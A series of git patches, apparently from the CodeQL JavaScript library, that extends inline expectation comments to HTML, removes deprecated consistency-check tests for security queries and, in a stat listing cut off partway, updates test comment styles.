From 79e2a758d76f143cd1c3ed2829065ca3fd3bd968 Mon Sep 17 00:00:00 2001 From: Asger F Date: Mon, 10 Feb 2025 13:27:46 +0100 Subject: [PATCH 001/115] JS: Allow more kinds of expectation comments --- .../test/internal/InlineExpectationsTestImpl.qll | 16 ++++++++++++---- 1 file changed, 12 insertions(+), 4 deletions(-) diff --git a/javascript/ql/lib/utils/test/internal/InlineExpectationsTestImpl.qll b/javascript/ql/lib/utils/test/internal/InlineExpectationsTestImpl.qll index 9e92f70af69f..42eb94230ae6 100644 --- a/javascript/ql/lib/utils/test/internal/InlineExpectationsTestImpl.qll +++ b/javascript/ql/lib/utils/test/internal/InlineExpectationsTestImpl.qll @@ -4,14 +4,22 @@ private import codeql.util.test.InlineExpectationsTest module Impl implements InlineExpectationsTestSig { private import javascript - final private class LineCommentFinal = LineComment; + final class ExpectationComment = ExpectationCommentImpl; - class ExpectationComment extends LineCommentFinal { - string getContents() { result = this.getText() } + class Location = JS::Location; + + abstract private class ExpectationCommentImpl extends Locatable { + abstract string getContents(); /** Gets this element's location. */ Location getLocation() { result = super.getLocation() } } - class Location = JS::Location; + private class JSComment extends ExpectationCommentImpl instanceof Comment { + override string getContents() { result = super.getText() } + } + + private class HtmlComment extends ExpectationCommentImpl instanceof HTML::CommentNode { + override string getContents() { result = super.getText() } + } } From 7e5c24a8ec732346b3e464d9bef92a1b6118b68e Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 4 Feb 2025 12:48:51 +0100 Subject: [PATCH 002/115] JS: Remove uses of old inline expectation test library --- .../CWE-022/TaintedPath/Consistency.expected | 0 .../CWE-022/TaintedPath/Consistency.ql | 9 -------- .../Security/CWE-073/Consistency.expected | 0 .../Security/CWE-073/Consistency.ql | 3 --- .../Security/CWE-078/Consistency.expected | 0 .../Security/CWE-078/Consistency.ql | 23 ------------------- .../ConsistencyDomBasedXss.expected | 0 .../DomBasedXss/ConsistencyDomBasedXss.ql | 9 -------- .../ConsistencyExceptionXss.expected | 0 .../ExceptionXss/ConsistencyExceptionXss.ql | 3 --- .../ConsistencyReflectedXss.expected | 0 .../ReflectedXss/ConsistencyReflectedXss.ql | 3 --- .../StoredXss/ConsistencyStoredXss.expected | 0 .../CWE-079/StoredXss/ConsistencyStoredXss.ql | 3 --- ...ConsistencyUnsafeHtmlConstruction.expected | 0 .../ConsistencyUnsafeHtmlConstruction.ql | 3 --- .../ConsistencyUnsafeJQueryPlugin.expected | 0 .../ConsistencyUnsafeJQueryPlugin.ql | 3 --- .../ConsistencyXssThroughDom.expected | 0 .../XssThroughDom/ConsistencyXssThroughDom.ql | 14 ----------- .../CWE-089/untyped/Consistency.expected | 0 .../Security/CWE-089/untyped/Consistency.ql | 4 ---- .../Security/CWE-502/Consistency.expected | 0 .../Security/CWE-502/Consistency.ql | 3 --- .../Consistency.expected | 0 .../ClientSideUrlRedirect/Consistency.ql | 9 -------- .../ResourceExhaustion/Consistency.expected | 0 .../CWE-770/ResourceExhaustion/Consistency.ql | 3 --- .../Consistency.expected | 1 - .../Consistency.ql | 16 ------------- 30 files changed, 109 deletions(-) delete mode 100644 javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-073/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-073/Consistency.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-078/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-078/Consistency.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-502/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-502/Consistency.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/Consistency.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-770/ResourceExhaustion/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-770/ResourceExhaustion/Consistency.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.ql deleted file mode 100644 index 0183ac6ade66..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.ql +++ /dev/null @@ -1,9 +0,0 @@ -import javascript -import semmle.javascript.security.dataflow.TaintedPathQuery -deprecated import utils.test.ConsistencyChecking - -deprecated class TaintedPathConsistency extends ConsistencyConfiguration { - TaintedPathConsistency() { this = "TaintedPathConsistency" } - - override DataFlow::Node getAnAlert() { TaintedPathFlow::flowTo(result) } -} diff --git a/javascript/ql/test/query-tests/Security/CWE-073/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-073/Consistency.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-073/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-073/Consistency.ql deleted file mode 100644 index eae82dc052fe..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-073/Consistency.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -import semmle.javascript.security.dataflow.TemplateObjectInjectionQuery -deprecated import utils.test.ConsistencyChecking diff --git a/javascript/ql/test/query-tests/Security/CWE-078/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-078/Consistency.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-078/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-078/Consistency.ql deleted file mode 100644 index 77e19c320dff..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-078/Consistency.ql +++ /dev/null @@ -1,23 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.CommandInjectionQuery as CommandInjection -import semmle.javascript.security.dataflow.IndirectCommandInjectionQuery as IndirectCommandInjection -import semmle.javascript.security.dataflow.ShellCommandInjectionFromEnvironmentQuery as ShellCommandInjectionFromEnvironment -import semmle.javascript.security.dataflow.UnsafeShellCommandConstructionQuery as UnsafeShellCommandConstruction -import semmle.javascript.security.dataflow.SecondOrderCommandInjectionQuery as SecondOrderCommandInjectionQuery - -deprecated class CommandInjectionConsistency extends ConsistencyConfiguration { - CommandInjectionConsistency() { this = "ComandInjection" } - - override File getAFile() { not result.getBaseName() = "uselesscat.js" } -} - -import semmle.javascript.security.UselessUseOfCat - -deprecated class UselessCatConsistency extends ConsistencyConfiguration { - UselessCatConsistency() { this = "Cat" } - - override DataFlow::Node getAnAlert() { result instanceof UselessCat } - - override File getAFile() { result.getBaseName() = "uselesscat.js" } -} diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.ql b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.ql deleted file mode 100644 index 87b27a68998c..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.ql +++ /dev/null @@ -1,9 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.DomBasedXssQuery - -deprecated class ConsistencyConfig extends ConsistencyConfiguration { - ConsistencyConfig() { this = "ConsistencyConfig" } - - override DataFlow::Node getAnAlert() { DomBasedXssFlow::flow(_, result) } -} diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.ql b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.ql deleted file mode 100644 index ec505e62e171..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.ExceptionXssQuery as ExceptionXss diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.ql b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.ql deleted file mode 100644 index 9019d53e10ed..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.ReflectedXssQuery as ReflectedXss diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.ql b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.ql deleted file mode 100644 index 38bae3a6aea6..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.StoredXssQuery as StoredXss diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.expected b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.ql b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.ql deleted file mode 100644 index e67885e96b96..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.UnsafeHtmlConstructionQuery as UnsafeHtmlConstruction diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.expected b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.ql b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.ql deleted file mode 100644 index d7e452b2a8c1..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.UnsafeJQueryPluginQuery as UnsafeJqueryPlugin diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.expected b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.ql b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.ql deleted file mode 100644 index 547763a8f838..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.ql +++ /dev/null @@ -1,14 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.XssThroughDomQuery - -deprecated class ConsistencyConfig extends ConsistencyConfiguration { - ConsistencyConfig() { this = "ConsistencyConfig" } - - override DataFlow::Node getAnAlert() { - exists(DataFlow::Node source | - XssThroughDomFlow::flow(source, result) and - not isIgnoredSourceSinkPair(source, result) - ) - } -} diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.ql deleted file mode 100644 index 9c721994d677..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.ql +++ /dev/null @@ -1,4 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.SqlInjectionQuery as SqlInjection -import semmle.javascript.security.dataflow.NosqlInjectionQuery as NosqlInjection diff --git a/javascript/ql/test/query-tests/Security/CWE-502/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-502/Consistency.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-502/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-502/Consistency.ql deleted file mode 100644 index 6c43567b5c45..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-502/Consistency.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -import semmle.javascript.security.dataflow.UnsafeDeserializationQuery -deprecated import utils.test.ConsistencyChecking diff --git a/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/Consistency.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/Consistency.ql deleted file mode 100644 index e02e59dcb19a..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/Consistency.ql +++ /dev/null @@ -1,9 +0,0 @@ -import javascript -import semmle.javascript.security.dataflow.ClientSideUrlRedirectQuery -import utils.test.ConsistencyChecking - -deprecated class ClientSideUrlRedirectConsistency extends ConsistencyConfiguration { - ClientSideUrlRedirectConsistency() { this = "ClientSideUrlRedirectConsistency" } - - override DataFlow::Node getAnAlert() { ClientSideUrlRedirectFlow::flowTo(result) } -} diff --git a/javascript/ql/test/query-tests/Security/CWE-770/ResourceExhaustion/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-770/ResourceExhaustion/Consistency.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-770/ResourceExhaustion/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-770/ResourceExhaustion/Consistency.ql deleted file mode 100644 index a5da63e682d0..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-770/ResourceExhaustion/Consistency.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -import semmle.javascript.security.dataflow.ResourceExhaustionQuery -deprecated import utils.test.ConsistencyChecking diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.expected deleted file mode 100644 index 8efa3a055b19..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.expected +++ /dev/null @@ -1 +0,0 @@ -| lib.js:70 | expected an alert, but found none | NOT OK | Config | diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.ql deleted file mode 100644 index d80f9d23ff52..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.ql +++ /dev/null @@ -1,16 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.PrototypePollutingAssignmentQuery - -deprecated class Config extends ConsistencyConfiguration { - Config() { this = "Config" } - - override File getAFile() { any() } - - override DataFlow::Node getAnAlert() { - exists(DataFlow::Node source | - PrototypePollutingAssignmentFlow::flow(source, result) and - not isIgnoredLibraryFlow(source, result) - ) - } -} From 9be041e27da36e8ccb2062e8a59be0478e3fa141 Mon Sep 17 00:00:00 2001 From: Asger F Date: Thu, 6 Feb 2025 13:34:01 +0100 Subject: [PATCH 003/115] JS: Update OK-style comments to $-style --- .../DeadAngularJSEventListener/tst.js | 26 +- .../AngularJS/DependencyMismatch/tst.js | 16 +- .../AngularJS/DisablingSce/DisablingSce.js | 10 +- .../angular-incompatible-service.js | 116 +++---- .../AngularJS/InsecureUrlWhitelist/tst.js | 30 +- .../missing-explicit-injection.js | 22 +- .../RepeatedInjection/repeated-injection.js | 20 +- .../unused-angular-dependency.js | 20 +- .../query-tests/AngularJS/UseNgSrc/tst.html | 5 +- .../query-tests/AngularJS/UseNgSrc/tst2.html | 3 +- .../AngularJS/UseNgSrc/tst_fragment.html | 3 +- .../query-tests/Comments/TodoComments/tst.js | 2 +- .../ql/test/query-tests/DOM/Alert/alert.js | 8 +- .../ql/test/query-tests/DOM/HTML/tst.js | 22 +- .../test/query-tests/DOM/TargetBlank/tst.js | 29 +- .../Declarations/ArgumentsRedefined/tst.js | 4 +- .../ArgumentsRedefined/types.d.ts | 4 +- .../Declarations/AssignmentToConst/classes.js | 3 +- .../Declarations/AssignmentToConst/const6.js | 2 +- .../AssignmentToConst/functions.js | 3 +- .../Declarations/AssignmentToConst/other.js | 2 +- .../Declarations/AssignmentToConst/tst.js | 16 +- .../Declarations/ClobberingVarInit/tst.js | 7 +- .../Declarations/DeadStoreOfGlobal/tst.js | 17 +- .../DeadStoreOfLocal/computedFieldNames.ts | 4 +- .../computedInterfaceProperty.ts | 10 +- .../DeadStoreOfLocal/exportDefaultClass.ts | 4 +- .../DeadStoreOfLocal/exportDefaultFunction.ts | 2 +- .../Declarations/DeadStoreOfLocal/extends.js | 2 +- .../DeadStoreOfLocal/for-of-continue.js | 2 +- .../DeadStoreOfLocal/namespace.ts | 2 +- .../Declarations/DeadStoreOfLocal/overload.ts | 12 +- .../Declarations/DeadStoreOfLocal/tst.js | 36 +- .../Declarations/DeadStoreOfLocal/tst2.js | 7 +- .../Declarations/DeadStoreOfLocal/tst3.js | 3 +- .../Declarations/DeadStoreOfLocal/tst3b.js | 3 +- .../DeadStoreOfProperty/accessors.js | 8 +- .../DeadStoreOfProperty/exports.js | 2 +- .../DeadStoreOfProperty/fieldInit.ts | 6 +- .../real-world-examples.js | 10 +- .../Declarations/DeadStoreOfProperty/tst.js | 38 +-- .../Declarations/DeclBeforeUse/jslint.js | 8 +- .../Declarations/DeclBeforeUse/tst2.js | 6 +- .../Declarations/DeclBeforeUse/typescript.ts | 4 +- .../Declarations/DuplicateVarDecl/tst.js | 5 +- .../IneffectiveParameterType/tst.js | 2 +- .../IneffectiveParameterType/tst.ts | 22 +- .../MissingThisQualifier/abstract-missing.ts | 2 +- .../ignored-by-externs.js | 2 +- .../MissingThisQualifier/ignored-by-jslint.js | 2 +- .../MissingThisQualifier/indirection.js | 4 +- .../MissingThisQualifier/missing1.js | 2 +- .../MissingThisQualifier/missing2.js | 2 +- .../MissingThisQualifier/namespaces-uses.ts | 38 +-- .../MissingThisQualifier/non-global.js | 2 +- .../not-ignored-by-jslint.js | 2 +- .../MissingThisQualifier/present1.js | 2 +- .../MissingThisQualifier/present2.js | 2 +- .../Declarations/MissingVarDecl/test.js | 30 +- .../MixedStaticInstanceThisAccess/abstract.ts | 2 +- .../instanceInstance.js | 2 +- .../instanceInstanceWithStaticExtra.js | 2 +- .../instanceStatic.js | 2 +- .../staticInstance.js | 2 +- .../staticStatic.js | 2 +- .../staticStaticWithInstanceExtra.js | 2 +- .../throughClass.js | 2 +- .../MixedStaticInstanceThisAccess/tst.js | 12 +- .../RedeclaredVariable/externs.js | 2 +- .../Declarations/RedeclaredVariable/tst.js | 2 +- .../Declarations/RedeclaredVariable/tst.ts | 6 +- .../Declarations/RedeclaredVariable/tst3.js | 2 +- .../Declarations/RedeclaredVariable/tst4.js | 8 +- .../SuspiciousMethodNameDeclaration/tst.js | 2 +- .../SuspiciousMethodNameDeclaration/tst.ts | 22 +- .../Declarations/TemporalDeadZone/tst.js | 15 +- .../Declarations/TooManyParameters/externs.js | 2 +- .../Declarations/UniqueParameterNames/tst.js | 10 +- .../Declarations/UniquePropertyNames/tst.js | 6 +- .../Declarations/UnreachableOverloads/tst.ts | 20 +- .../Declarations/UnstableCyclicImport/A.ts | 2 +- .../Declarations/UnstableCyclicImport/B.ts | 2 +- .../UnstableCyclicImport/acyclicImport.ts | 2 +- .../UnstableCyclicImport/exportCycleA.ts | 2 +- .../UnstableCyclicImport/exportCycleB.ts | 2 +- .../UnstableCyclicImport/safeA.ts | 2 +- .../UnstableCyclicImport/safeB.ts | 2 +- .../UnstableCyclicImport/typeA.ts | 2 +- .../Declarations/UnusedParameter/istype.ts | 4 +- .../UnusedParameter/parameter_field.ts | 4 +- .../UnusedParameter/thisparameter.ts | 2 +- .../Declarations/UnusedParameter/tst.js | 16 +- .../Declarations/UnusedParameter/tst2.js | 13 +- .../UnusedVariable/Babelrc/importPragma.jsx | 2 +- .../UnusedVariable/UnusedIndexVariable.js | 2 +- .../Declarations/UnusedVariable/decorated.ts | 10 +- .../Declarations/UnusedVariable/externs.js | 5 +- .../UnusedVariable/importWithoutPragma.jsx | 2 +- .../Declarations/UnusedVariable/importtype.ts | 4 +- .../Declarations/UnusedVariable/interTypes.ts | 2 +- .../UnusedVariable/namespaceImportAsType.ts | 6 +- .../Declarations/UnusedVariable/node.js | 2 +- .../Declarations/UnusedVariable/react-jsx.js | 2 +- .../UnusedVariable/require-react-1.js | 2 +- .../UnusedVariable/require-react-2.js | 2 +- .../UnusedVariable/require-react-3.js | 2 +- .../require-react-in-other-scope.js | 2 +- .../Declarations/UnusedVariable/thisparam.ts | 2 +- .../typeInTemplateLiteralTag.ts | 6 +- .../Declarations/UnusedVariable/typeoftype.ts | 8 +- .../Declarations/UnusedVariable/types.d.ts | 2 +- .../Declarations/UnusedVariable/underscore.js | 12 +- .../UnusedVariable/unusedShadowed.ts | 6 +- .../EnablingNodeIntegration.js | 12 +- .../Expressions/BitwiseSignCheck/tst.js | 12 +- .../Expressions/CompareIdenticalValues/tst.js | 17 +- .../Expressions/DuplicateProperty/tst.js | 14 +- .../Expressions/ExprHasNoEffect/es2015.js | 2 +- .../Expressions/ExprHasNoEffect/should.js | 2 +- .../Expressions/ExprHasNoEffect/try.js | 2 +- .../Expressions/ExprHasNoEffect/tst.js | 61 ++-- .../Expressions/ExprHasNoEffect/tst2.js | 3 +- .../HeterogeneousComparison/tst.js | 149 ++++----- .../ImplicitOperandConversion/tst.js | 65 ++-- .../Expressions/MissingAwait/tsTest.ts | 2 +- .../Expressions/MissingAwait/tst.js | 42 +-- .../MissingDotLengthInComparison.js | 14 +- .../Expressions/MisspelledIdentifier/tst.js | 31 +- .../Expressions/RedundantExpression/tst.js | 2 +- .../Expressions/SelfAssignment/jsdoc.js | 4 +- .../Expressions/SelfAssignment/tst.js | 15 +- .../Expressions/ShiftOutOfRange/tst.js | 4 +- .../Expressions/SuspiciousInvocation/eval.js | 8 +- .../SuspiciousInvocation/namespace.ts | 12 +- .../Expressions/SuspiciousInvocation/super.js | 5 +- .../export_equals_client.ts | 2 +- .../export_import_client.ts | 2 +- .../Expressions/SuspiciousPropAccess/tst2.ts | 2 +- .../SuspiciousPropAccess/typeassertion.ts | 4 +- .../SuspiciousPropAccess/typeoftype.ts | 4 +- .../UnboundEventHandlerReceiver/tst.js | 38 +-- .../UnclearOperatorPrecedence/tst.js | 14 +- .../UnclearOperatorPrecedence/tst.min.js | 2 +- .../UnknownDirective/UnknownDirective.html | 8 +- .../UnknownDirective/UnknownDirective.js | 66 ++-- .../global-module-definition.js | 2 +- .../module-environment-detection.js | 2 +- .../regression.js | 4 +- .../UnneededDefensiveProgramming/tst.js | 128 ++++---- .../UnneededDefensiveProgramming/tst2.js | 6 +- .../WhitespaceContradictsPrecedence/tst.js | 9 +- .../JSDoc/UndocumentedParameter/tst.js | 7 +- .../LanguageFeatures/BadTypeof/tst.js | 23 +- .../LanguageFeatures/EmptyArrayInit/tst.js | 14 +- .../ExpressionClosures/tst.js | 7 +- .../LanguageFeatures/IllegalInvocation/tst.js | 38 +-- .../LanguageFeatures/InconsistentNew/a1.js | 4 +- .../LanguageFeatures/InconsistentNew/a2.js | 4 +- .../InconsistentNew/arraycalls.js | 4 +- .../LanguageFeatures/InconsistentNew/tst.js | 8 +- .../LanguageFeatures/InvalidPrototype/tst.js | 18 +- .../LengthComparisonOffByOne/tst.js | 23 +- .../NonLinearPattern/ts-test.ts | 23 +- .../LanguageFeatures/NonLinearPattern/tst.js | 13 +- .../PropertyWriteOnPrimitive/tst.js | 18 +- .../SemicolonInsertion/tst.js | 14 +- .../SetterIgnoresParameter/tst.js | 12 +- .../LanguageFeatures/SetterReturn/tst.js | 7 +- .../SpuriousArguments/es2015.js | 10 +- .../SpuriousArguments/globals.js | 8 +- .../SpuriousArguments/thisparameter.ts | 4 +- .../LanguageFeatures/SpuriousArguments/tst.js | 55 ++-- .../StrictModeCallStackIntrospection/tst.js | 20 +- .../TemplateSyntaxInStringLiteral.js | 4 +- .../YieldInNonGenerator/tst.js | 3 +- .../query-tests/NodeJS/DubiousImport/main.js | 2 +- .../NodeJS/DubiousImport/multi_import.js | 6 +- .../query-tests/NodeJS/InvalidExport/tst.js | 4 +- .../query-tests/NodeJS/InvalidExport/tst2a.js | 2 +- .../query-tests/NodeJS/InvalidExport/tst2b.js | 2 +- .../query-tests/NodeJS/InvalidExport/tst2c.js | 2 +- .../query-tests/NodeJS/InvalidExport/tst3.js | 2 +- .../query-tests/NodeJS/InvalidExport/tst3b.js | 2 +- .../query-tests/NodeJS/InvalidExport/tst4.js | 4 +- .../query-tests/NodeJS/InvalidExport/tst5.js | 2 +- .../query-tests/NodeJS/InvalidExport/tst6.js | 2 +- .../query-tests/NodeJS/MissingExports/tst.js | 12 +- .../UnresolvableImport/src/sub/subsub/tst.js | 4 +- .../NodeJS/UnresolvableImport/src/sub/tst.js | 4 +- .../NodeJS/UnresolvableImport/src/tst.js | 22 +- .../NodeJS/UnresolvableImport/tst.js | 2 +- .../Performance/NonLocalForIn/tst.js | 21 +- .../ReassignParameterAndUseArguments/tst.js | 7 +- .../React/InconsistentStateUpdate/tst.js | 32 +- .../tst.js | 58 ++-- .../undefined.js | 62 ++-- .../UnusedOrUndefinedStateProperty/unused.js | 26 +- .../RegExp/BackrefBeforeGroup/tst.js | 14 +- 